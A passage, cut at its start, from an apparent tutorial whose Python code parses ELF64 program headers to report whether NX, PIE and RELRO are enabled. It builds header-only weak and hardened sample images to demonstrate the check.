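        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs


def mitigations(data):
    """Mini checksec: what the headers alone reveal about NX, PIE and RELRO."""
    e_type, phdrs = parse_elf64(data)
    stack = [f for t, f in phdrs if t == PT_GNU_STACK]
    # checksec reports NX disabled when PT_GNU_STACK is missing or marks the stack executable
    nx = bool(stack) and not (stack[0] & PF_X)
    return {
        "NX": nx,
        "PIE": e_type == ET_DYN,
        # PT_GNU_RELRO alone is partial RELRO; full RELRO additionally needs DT_BIND_NOW in .dynamic
        "RELRO": any(t == PT_GNU_RELRO for t, _ in phdrs),
    }


def build_elf64(e_type, phdrs):
    """Constructed sample: a header-only ELF64 image (no code), enough for header-level checks."""
    ehdr_size, phdr_size = 64, 56
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # ELFCLASS64, little-endian, version 1
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", ident, e_type, 0x3E, 1, 0x400000, ehdr_size, 0, 0,
                       ehdr_size, phdr_size, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return ehdr + body


# Two constructed images: a fixed-address binary with an executable stack and no RELRO
# (the shape that lets a write-up hardcode addresses), and a hardened one.
WEAK = build_elf64(ET_EXEC, [(PT_LOAD, PF_R | PF_X), (PT_GNU_STACK, PF_R | PF_W | PF_X)])
HARDENED = build_elf64(ET_DYN, [(PT_LOAD, PF_R | PF_X), (PT_GNU_STACK, PF_R | PF_W),
                                (PT_GNU_RELRO, PF_R)])

if __name__ == "__main__":
    print("weak:    ", mitigations(WEAK))
    print("hardened:", mitigations(HARDENED))
```

On a real binary, pass the file's bytes to mitigations(); the program-header walk is the same one the loader does, so it works on stripped files too.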
